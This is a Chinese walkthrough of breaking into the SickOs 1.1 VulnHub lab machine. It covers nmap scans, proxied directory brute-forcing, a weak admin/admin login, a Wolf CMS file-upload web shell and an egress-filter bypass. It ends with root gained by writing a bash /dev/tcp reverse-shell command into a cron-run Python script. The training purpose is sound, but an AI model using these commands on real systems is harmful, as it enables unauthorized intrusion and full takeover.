[Vulhub]Sickos靶机渗透

[Vulhub靶机]Sick0s靶机渗透

靶机搭建

下载地址:

https://download.vulnhub.com/sickos/sick0s1.1.7z

下载后设置nat模式即可与攻击机同一网段

kali:192.168.88.133

1.信息收集

主机发现

sudo nmap -sn 192.168.88.0/24

发现主机192.168.88.132

端口扫描

开始对其进行TCP的快速扫描，可以看到能扫出来一些基本端口信息。

sudo nmap -sT --min-rate=10000 -p- 192.168.88.132 -oA vulhub/sickos1.1/ports1

接下来我们再使用udp扫描一次

sudo nmap -sU --top-port 20 192.168.88.132 -oA vulhub/sickos1.1/udpports1

接着，对探测到的开放端口进行详细的tcp扫描

sudo nmap -sT -sV -sC -O -p22,3128 192.168.88.132 -oA vulhub/sickos1.1/details1

最后使用nmap自带的漏扫脚本进行一遍检测

sudo nmap --script=vuln -p22,3128 192.168.88.132 -oA vulhub/sickos1.1/vuln1

漏洞探测发现

代理服务渗透

Squid 是一款开源的 HTTP/HTTPS 代理服务器，核心用于代理转发、缓存加速和访问控制，广泛应用于企业、CDN 等场景。

我们看到3128运行的服务是squid-http。端口而且为3128，可以推测大概率为正向代理。反向代理的话一般作用是隐藏web服务，更可能为80，8080等等

思路:先将常见端口访问一下。如果没有我们再进行web全端口扫描。

配置代理后端口访问,80,443,8080,9090

在访问80端口时，成功出现web界面

Web渗透

这个页面没什么信息，使用dirsearch进行目录爆破

dirsearch -u http://192.168.88.132:80 --proxy=http://192.168.88.132:3128

访问/robots.txt，找到/wolfcms路径

访问/connect，下载了connect.py文件。打印了两句话可能是提示

访问/wolfcms，很明显能看出这一个cms，去浏览器了解了一下这个cms的结构和历史漏洞

通过？后的路径访问/admin/login管理员登录后台，接下来去github找一下源码中的默认密码，没找到写的固定的，可能是安装过程中会设置密码

php源码默认密码可能存在的几个地方

1. 配置文件目录（最常见）

2. 数据库初始化脚本（默认用户数据）

3. 安装 / 帮助文档

4. 代码逻辑中的硬编码（较少见）

试试弱口令，成功admin/admin登录后台，可以看到版本信息0.8.2，然后搜索到了相关的文件上传漏洞在Files，尝试复现

成功上传php一句话木马。注意解析php的路径http://192.168.88.132/wolfcms/public/test.php

访问php路径成功但是kali显示的是秒连然后断开。可能防火墙对出口进行了限制。我们尝试把端口改为80,443,8080这些常用web端口进行绕过，这台靶机直接用80.其实这也就是 Weekly的核心绕过原理。如果没成功再试试Weekly,因为他还会加密混淆

直接成功getshell

提权

首先进行内核提权

发现有wget命令，我们直接把linpeas.sh上传在机器上信息收集。在kali上搭建http服务即可

这里有存在脏牛漏洞，可以直接提权。不过继续看看其他思路

linpeas还扫出了php的数据库配置信息，随机我去查看这个数据库的信息

果然成功找到了数据库的账号密码，看到root第一个想法肯定是ssh试试能不能连,不过失败了

不过mysql权限运行的，也不能想着用mysql提权了

查看一下定时任务

find / -name 'cron*' 2>/dev/null

第一个进视野的就是下面的那个cron.php,因为就这个是php，查看一下。不过啥也没有，只是这个cms的定时任务做一些配置

接下来逐个看看定时任务，苦苦寻找竟然还真找到了一个root执行connect.py的定时任务。看一下有没有写入的权限然后

权限拉满，直接python提权就行了

写入python执行反弹shell的命令，等待一分钟后成功提权

echo "import os;os.system('bash -c \"bash -i &> /dev/tcp/192.168.88.133/443 0>&1\"')" > /var/www/connect.py

不过最后我查看了wp，发现其实之前找到john@123是sickos的密码。所以得试全，账号密码

总结

·1.首先扫描到http代理后，要尝试挂上这个代理访问http端口可能会有收获

2.当拿到账号密码时得试全

3.当遇到可能有防火墙出端口拦截时，可以尝试通过http开放端口来绕过